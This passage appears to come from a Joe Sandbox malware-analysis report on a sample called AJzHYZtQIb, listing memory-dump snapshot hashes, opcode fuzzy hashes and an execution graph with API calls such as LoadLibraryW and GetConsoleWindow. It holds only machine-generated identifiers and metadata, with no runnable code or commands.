                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 71e93935ea03e12412e913c175d0506ecc3c9662df7db9b8482c09a94b34b044
                        • Instruction ID: e074fa948ea16a3af3e1d10e281a6aaff72c0af539627e7a7056b4df6ab114cd
                        • Opcode Fuzzy Hash: 71e93935ea03e12412e913c175d0506ecc3c9662df7db9b8482c09a94b34b044
                        • Instruction Fuzzy Hash: 51F0F6759592D48FC712C778C855688BFB0EF26256B5882CBD895CB3A3E239860BCB01
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: db3ff3a9dd1f8c3a713f593a5361feab599135e07860675e02131e930c46e349
                        • Instruction ID: 68088c1d856501f3ed74fd499c2266a6ead47e20edea5d8c3b73329c33d90e61
                        • Opcode Fuzzy Hash: db3ff3a9dd1f8c3a713f593a5361feab599135e07860675e02131e930c46e349
                        • Instruction Fuzzy Hash: CB01A234A08218DFCB14CF94C6859ECBBB5FB4D362F2026A9D45AA7351C734AE82CF50
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 178bc0fa8d16c79736322c9581105ee8c44a588dc4ca1a06c426baf426020422
                        • Instruction ID: 77d6ce6b68019c13c22aa1f108b242d8169d62b4f32b85cf9cc8893f50de17da
                        • Opcode Fuzzy Hash: 178bc0fa8d16c79736322c9581105ee8c44a588dc4ca1a06c426baf426020422
                        • Instruction Fuzzy Hash: 84F0B432910B1587C710AF6CE414485F7B5EF95325700863FE54A67200FF31A898CBD0
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 36dbec588e0325a56e28ef04b3d5a0c21853faf92a99e0a3e03ae68becaaf106
                        • Instruction ID: 66b60bf8a8e160bad8cf7c3748ef5a1bd7dc6f76c82ab2f314eb1b5baa066e82
                        • Opcode Fuzzy Hash: 36dbec588e0325a56e28ef04b3d5a0c21853faf92a99e0a3e03ae68becaaf106
                        • Instruction Fuzzy Hash: DBF01D35E146199BCB00EBA8D8004DEB7B5FF89211F00C626D559B7200FB306A598BD1
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: edec57b97a75bbce4ec30ccfdac24d547821057ad2064816b29025792c1da2e4
                        • Instruction ID: fbec4e1df15b7e1e229ab62d68c865ffbe076e2449186cddf352e6941d8b41c5
                        • Opcode Fuzzy Hash: edec57b97a75bbce4ec30ccfdac24d547821057ad2064816b29025792c1da2e4
                        • Instruction Fuzzy Hash: 93F0E235E0E608CFDB00CB55E884AE8777AEB8A246F0873B9C08DD3116D6704A0A8E12
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4b5dd87ffa848d7fd4b9576802d4aa112906ed86c15dd25e60ef255bdceda9dc
                        • Instruction ID: 1b734ba48a9e502034392f77a3c17c9ac04ea1ca92a9b286eb879cf0b7eb7cd0
                        • Opcode Fuzzy Hash: 4b5dd87ffa848d7fd4b9576802d4aa112906ed86c15dd25e60ef255bdceda9dc
                        • Instruction Fuzzy Hash: 99F0F0309041449FC715DF68C800AEEBFB2EF46311F0492A9D8681B3A2CB310946DB14
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b69a26ff45380d3e582f496cf8928117e6ac65848abb61a215ebad5a3031629d
                        • Instruction ID: c16c33bfeca0ab5ddecad7d820115bb3e6b9256344d5abcfe559546cf6949c96
                        • Opcode Fuzzy Hash: b69a26ff45380d3e582f496cf8928117e6ac65848abb61a215ebad5a3031629d
                        • Instruction Fuzzy Hash: 58F0F0B0908294CFC712CFA8D8855A97FF0EF06356B1486DEE8909B7A2C7789402CB41
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fa296b36891268347e297f253fc81cd357d10a69696ff914097617af513891c2
                        • Instruction ID: d4ee7e9411a6e985cb63e04456f99c017e7d7bafb02395b0a6e088e6f2f6629b
                        • Opcode Fuzzy Hash: fa296b36891268347e297f253fc81cd357d10a69696ff914097617af513891c2
                        • Instruction Fuzzy Hash: C3F01270D05108EFC714EF65D845AADFFB2EF49311F00D2A9A818A3350DB305951CB54
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 86252cd4d269c83109b941e424b043a6752054bf1e184da41c42abf4d6fb906e
                        • Instruction ID: 2f323e408ae512a6c8476a1ce7d8c28ad4bc9e9627e50a7de5ea67dec0c1b25d
                        • Opcode Fuzzy Hash: 86252cd4d269c83109b941e424b043a6752054bf1e184da41c42abf4d6fb906e
                        • Instruction Fuzzy Hash: 75F034B0C09248DFCB00DFA9A8422AEBFF1AB09301F0081AAD868E3212EB344601CF51
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 65176f76ae0af2c05f67d4765e49ded18b52630155538bf8141cb777958c3aab
                        • Instruction ID: b19f2be60bb458d7e89ec40e394c8d8c34c1ea4ab0c7cfdd456daa4fbd2b9263
                        • Opcode Fuzzy Hash: 65176f76ae0af2c05f67d4765e49ded18b52630155538bf8141cb777958c3aab
                        • Instruction Fuzzy Hash: B6F02731A14B008BC715AFBCE419586BB71EF46302B00C66FE48AAB111FF30948CCB91
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 293d14d28bbae4d43a1b3c488700f20a3e95c167eca95ead904d075d36e6b63d
                        • Instruction ID: 9c29da50947dfa6653ec63c9f4475008eeb27777229517be0d1a2d47b85c4087
                        • Opcode Fuzzy Hash: 293d14d28bbae4d43a1b3c488700f20a3e95c167eca95ead904d075d36e6b63d
                        • Instruction Fuzzy Hash: 48F08CB59042598FCB15CFA8D98469DBBB0FF08325F1482A8D8249B392CB39A502CB90
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9907f7645f91eabaf8c9d993c066df6f00ac1e5d570669ad6ee135f0c741fead
                        • Instruction ID: c04837cf549a59afc720d2ab36ffbae91b3c3395dd5dd30afa865b867da7200d
                        • Opcode Fuzzy Hash: 9907f7645f91eabaf8c9d993c066df6f00ac1e5d570669ad6ee135f0c741fead
                        • Instruction Fuzzy Hash: A8F032B4D08208DFCB40EFA9D8022ADBBF5FB08301F0091AAD828A3300EB744A01CF40
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c92e80006ca6288580a20baf9d975fcf68fd5fd86994bdfe711959451b2257ac
                        • Instruction ID: ec909e87440c54c243c22acb22174743616ab262813fb3ef8a9748364581477d
                        • Opcode Fuzzy Hash: c92e80006ca6288580a20baf9d975fcf68fd5fd86994bdfe711959451b2257ac
                        • Instruction Fuzzy Hash: 84F09235A1A254EFC741CF64E484DAC7BBAFB4A212B1515A4F8459B352D735E842CB00
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 874e30a87d859acf6491ecc7e6b647d8af218846bb53c3ab7edc2722bf11d9ce
                        • Instruction ID: 320c14d3621e97d1f57273e108a6ca59f895a9946da1d979eb35aa3c01b8b7c2
                        • Opcode Fuzzy Hash: 874e30a87d859acf6491ecc7e6b647d8af218846bb53c3ab7edc2722bf11d9ce
                        • Instruction Fuzzy Hash: 5DF0E570C04249CFCB16CFA8C84479DBFB1FB05325F1486ADD86067382C7395142CB81
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5062ab3c6ee4915acc0300bbbd6a59cce1acda5fd8af1a86035edee6458f7f7
                        • Instruction ID: 5cfe886c234205896fdfa964b5fc4ff2c971e1d44d945ad89b4d3564be25c689
                        • Opcode Fuzzy Hash: f5062ab3c6ee4915acc0300bbbd6a59cce1acda5fd8af1a86035edee6458f7f7
                        • Instruction Fuzzy Hash: 7BF0C934A19114EFCB14CB50C1848ACB7BAFB4D2A2B546685D04967211C731ED42CF11
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 88be1d3f71dfec1b3702c000d461dd85485de3a6ca323c927c914c5a32a2be6f
                        • Instruction ID: f215e31167b19de45c1b2725694aa9120010afab834f90cc05823487d2c0ac7e
                        • Opcode Fuzzy Hash: 88be1d3f71dfec1b3702c000d461dd85485de3a6ca323c927c914c5a32a2be6f
                        • Instruction Fuzzy Hash: F0E0E5B4D04218DFCB44EFA8D945AAEBBF0FB08301F1086AAE818E7351D7709A40CF91
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 760d824f380ac2af387aa2ca259c2e0423f0739dd80dca55bdda0d482ad991b3
                        • Instruction ID: 5516401b8577d706e56f7c82d6fe60ca149cbfe52208ffef8a41e807bc4a00b6
                        • Opcode Fuzzy Hash: 760d824f380ac2af387aa2ca259c2e0423f0739dd80dca55bdda0d482ad991b3
                        • Instruction Fuzzy Hash: D8E0E53580420CEFCF06DFA4D90599D7F76FB09312F108198F90522260C7329AA1EF95
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d1841a8bad4036342cda454a7a4c4de97de5231259b2caf4ec226fb779d3fd81
                        • Instruction ID: b0fe2b343b8ecfb38d673ca9f7a9280a8f460d72ccad5dbaf7f85937bf64974d
                        • Opcode Fuzzy Hash: d1841a8bad4036342cda454a7a4c4de97de5231259b2caf4ec226fb779d3fd81
                        • Instruction Fuzzy Hash: 69E0E5B0D05208EFCB44EFA8C9456AEBBB1FB08301F5086AAD818A3340D7759691DB81
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 00ec127924dcdf55d6da7580201967e7711907d2da68786e3d860af142caed3f
                        • Instruction ID: f7d6a65cca4560a1fea07db0b58f559a631ee878627512489f76e087a079016b
                        • Opcode Fuzzy Hash: 00ec127924dcdf55d6da7580201967e7711907d2da68786e3d860af142caed3f
                        • Instruction Fuzzy Hash: F3D05E323501249FC3009BF9F809F937BECEB48665B1140A6F20CCB221DAA2E8008784
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b853accdce0c71245fc84067e00eb4691388644f13225b50bbecb1f23aa79724
                        • Instruction ID: ca1292ae1fcaa48236ea819629fd0c702374bef475b94862c288445cee7a345a
                        • Opcode Fuzzy Hash: b853accdce0c71245fc84067e00eb4691388644f13225b50bbecb1f23aa79724
                        • Instruction Fuzzy Hash: F1D02B31B00058D74B10E665A0200FE7773DBD92A3B204269C906A3300DF35DD13CB51
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 71b4411a0ae5bf91a90cd3474ea033217322c90851a6d6eaac05f26bba76bfdc
                        • Instruction ID: fae9d62aadc4bb0f57dff31ffd259d47c1341acff27a6cf76e54fbcc0f9a188f
                        • Opcode Fuzzy Hash: 71b4411a0ae5bf91a90cd3474ea033217322c90851a6d6eaac05f26bba76bfdc
                        • Instruction Fuzzy Hash: 8FE09274E25208EFCB80DFA9D449A9CBBF5EB08711F1081EAE818D7361E6359A54CF41
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 78422fb26c9be5ee069c12f306013294e58079cf717b4401c16960f73681ce45
                        • Instruction ID: 926e7ac63f866ec54b481ade4136d9d6da6d8b393ba93607a46c918b00bf192d
                        • Opcode Fuzzy Hash: 78422fb26c9be5ee069c12f306013294e58079cf717b4401c16960f73681ce45
                        • Instruction Fuzzy Hash: 2CE0D830C481C59FC706CFACD88128CBF709B01351F1442EDE86497292CB3A4546C741
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4de314e4d2b102ddf06b5605ec9da91ec54c8cfd5ebd607efb9e42772fdbaa26
                        • Instruction ID: 4bef7aa626a90e76fcd39f47886211705daf2c438a785b6c4c14481e5a371269
                        • Opcode Fuzzy Hash: 4de314e4d2b102ddf06b5605ec9da91ec54c8cfd5ebd607efb9e42772fdbaa26
                        • Instruction Fuzzy Hash: FAE0CD2154D1C68BC312C768DD457593FA14702221F0C02DD89944B2F3CA1A4517C393
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d7799b9d52b1f414887e4a7bca66f472119dc856a0a348e68c4469f1bc143b01
                        • Instruction ID: 3bd45e272fdcf2d03474b821b5f7483d0e0dcc94e635a78962ed7e9ab960ac44
                        • Opcode Fuzzy Hash: d7799b9d52b1f414887e4a7bca66f472119dc856a0a348e68c4469f1bc143b01
                        • Instruction Fuzzy Hash: B3E0E2B4D15208AFCB80EFB9D44529CBFF4EB04301F0081AAA828A3240EB395A54CF81
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c73d6091ece91555157646a80b57bcc50746a2ce24d3afc424da5c5490369930
                        • Instruction ID: 381286f95a6f6e3a135b395abfc7adb03e66acd07299212e89d18b6edfb8dc4e
                        • Opcode Fuzzy Hash: c73d6091ece91555157646a80b57bcc50746a2ce24d3afc424da5c5490369930
                        • Instruction Fuzzy Hash: D6E04634C04268CFEB50CF69D848B9CB7B1FF48362F0056AAE00BAA240C7305A86CF20
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3eb2cfb9eb7fdd0e5336e51bc4dc7b58cec98121e84b60460a7985c914019d5d
                        • Instruction ID: 1a18b4a2514487afb59cab3f6b35b972e7bedf9311815aa6c5f0f97366526004
                        • Opcode Fuzzy Hash: 3eb2cfb9eb7fdd0e5336e51bc4dc7b58cec98121e84b60460a7985c914019d5d
                        • Instruction Fuzzy Hash: FDD0A930C2A20CDFC700EBB8E90A29DBBB59B00302F1001A88809932A1EA315E24C782
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 71f25ee6493b5a6355cf844b177707da134075fa3b654f36c7773876df066f37
                        • Instruction ID: b0be0fe175c11e1fe4618ed318d3f9cda2b62da739035d0a8a651d02f19ee41c
                        • Opcode Fuzzy Hash: 71f25ee6493b5a6355cf844b177707da134075fa3b654f36c7773876df066f37
                        • Instruction Fuzzy Hash: 24D0A73110C254EFC346DF50D4854AC3F7DBB0511275415A4F49A8F396CB35D842CB40
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ac4ce570f97e000c93081e8c2a7fd7a4ccfa2bf6b5fc090886c94ffdb52c521
                        • Instruction ID: f44b434909052d59add278b99a237e02c33ebae95f5874f59dc1059e2e7084f5
                        • Opcode Fuzzy Hash: 6ac4ce570f97e000c93081e8c2a7fd7a4ccfa2bf6b5fc090886c94ffdb52c521
                        • Instruction Fuzzy Hash: 20C08C3002A204CBC31177A4F50E3647FA86B02223F440014F049000518EBA4090CB66
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aa989b5a079d2b3d9c81b9a1c48d71ec4a8ddaced1d35a98be0d351464e86f95
                        • Instruction ID: 3a09330a8b0e869adaa26c69e0a1a5b6c49abce78acc1effb8c28594600be8df
                        • Opcode Fuzzy Hash: aa989b5a079d2b3d9c81b9a1c48d71ec4a8ddaced1d35a98be0d351464e86f95
                        • Instruction Fuzzy Hash: F1C02B39140000BFA600EB40C5C0C66BEA0FF92300B80DD12F1C645034CB22C41EDB12
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f065dd349ab85e7817d0932793e6e31815c019d027d5bdce9d552b9de633beba
                        • Instruction ID: 46de14af4484661964a5bd452d8ccd9bd1deeb74855eb8f6695f887c7b01509f
                        • Opcode Fuzzy Hash: f065dd349ab85e7817d0932793e6e31815c019d027d5bdce9d552b9de633beba
                        • Instruction Fuzzy Hash: 8EB0127140800596CA048684AC44824B734AA4723132C0345F47E825C0F71040608D11

                        Execution Graph

                        Execution Coverage:13.6%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:30
                        Total number of Limit Nodes:1
                        execution_graph 32918 6786361 32919 67862fc 32918->32919 32921 678636a 32918->32921 32920 678631d 32919->32920 32924 6787400 32919->32924 32928 67873f1 32919->32928 32925 6787448 32924->32925 32926 6787451 32925->32926 32932 6786f98 32925->32932 32926->32920 32929 678738d 32928->32929 32929->32928 32930 6787451 32929->32930 32931 6786f98 LoadLibraryW 32929->32931 32930->32920 32931->32930 32933 67875f0 LoadLibraryW 32932->32933 32935 6787665 32933->32935 32935->32926 32936 10d0871 32937 10d0889 32936->32937 32940 10d08c8 32936->32940 32945 10d08d8 32936->32945 32941 10d08fa 32940->32941 32950 10d0ce0 32941->32950 32954 10d0ce8 32941->32954 32942 10d093e 32942->32937 32946 10d08fa 32945->32946 32948 10d0ce8 GetConsoleWindow 32946->32948 32949 10d0ce0 GetConsoleWindow 32946->32949 32947 10d093e 32947->32937 32948->32947 32949->32947 32951 10d0d26 GetConsoleWindow 32950->32951 32953 10d0d56 32951->32953 32953->32942 32955 10d0d26 GetConsoleWindow 32954->32955 32957 10d0d56 32955->32957 32957->32942

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2174 67875e8-6787630 2176 6787638-6787663 LoadLibraryW 2174->2176 2177 6787632-6787635 2174->2177 2178 678766c-6787689 2176->2178 2179 6787665-678766b 2176->2179 2177->2176 2179->2178
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,067874A6), ref: 06787656
                        Memory Dump Source
                        • Source File: 00000015.00000002.2374212919.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_6780000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 865fea2e0c6fce7a9090904dfa96fee5178732bf8ff4319f54108f421f3feb6f
                        • Instruction ID: 31cffc3d7668c2a08b302399f80460a3ca53cf8cb32f21614818615d0159fcea
                        • Opcode Fuzzy Hash: 865fea2e0c6fce7a9090904dfa96fee5178732bf8ff4319f54108f421f3feb6f
                        • Instruction Fuzzy Hash: 981126B5D006498FDB14EF9AC844ADEFBF5EF88310F14842AD419A7610D379A946CFA1
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,067874A6), ref: 06787656
                        Memory Dump Source
                        • Source File: 00000015.00000002.2374212919.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_6780000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: a45663b08e0783c716d3bc01c561f1e0338eaff7f36a24796f702316ed7e5a18
                        • Instruction ID: b45a5494337b79f424416c07699d858f1fa7a3599c02dd9cf552d202bba1af1a
                        • Opcode Fuzzy Hash: a45663b08e0783c716d3bc01c561f1e0338eaff7f36a24796f702316ed7e5a18
                        • Instruction Fuzzy Hash: 361126B1D007498FCB14DF9AC444A9EFBF5EF48210F14841AD41AB7610D379A945CFA5
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 010D0D47
                        Memory Dump Source
                        • Source File: 00000015.00000002.2356179623.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_10d0000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: 6626264a3b32a1fac9fd5b8722b9ce7bb5a0514674810aebd1130237729b2e2c
                        • Instruction ID: d74991516d33b56870beefd3557c59634b4cfa7b80168b5cec69bef97d93cc69
                        • Opcode Fuzzy Hash: 6626264a3b32a1fac9fd5b8722b9ce7bb5a0514674810aebd1130237729b2e2c
                        • Instruction Fuzzy Hash: 6F114671C003488FDB24EFAAD4497EEBBF4EF88320F20841AD019A7240C739A944CFA0
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 010D0D47
                        Memory Dump Source
                        • Source File: 00000015.00000002.2356179623.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_10d0000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: c37696e7bc488f7501fdf5d6be255145a5b5c98310c69c8e9c1621b958f16810
                        • Instruction ID: 5985319bf6bfa482aa3c2e2c309e17cfd81965cf531c3142d7dde46697967386
                        • Opcode Fuzzy Hash: c37696e7bc488f7501fdf5d6be255145a5b5c98310c69c8e9c1621b958f16810
                        • Instruction Fuzzy Hash: E71125B1D003498FCB20EFAAC44579EFFF5AB48314F20841AD519A7240CB79A544CBA1
                        Memory Dump Source
                        • Source File: 00000015.00000002.2374354912.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_67d0000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1e5f778075a7f2a9ee95403f6271852739e1a6f8e79e6057fe2094703046e154
                        • Instruction ID: 70db1cf2268a7987cf1151fcbccf800aa230e468f8329a8e28ce749c1e59e48f
                        • Opcode Fuzzy Hash: 1e5f778075a7f2a9ee95403f6271852739e1a6f8e79e6057fe2094703046e154
                        • Instruction Fuzzy Hash: 53C25C30E402189FCB14DB68CD90EADBBB6FF88700F508499E645AB365DB71AD81CF65
                        Memory Dump Source
                        • Source File: 00000015.00000002.2374354912.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                        Joe Sandbox IDA Plugin
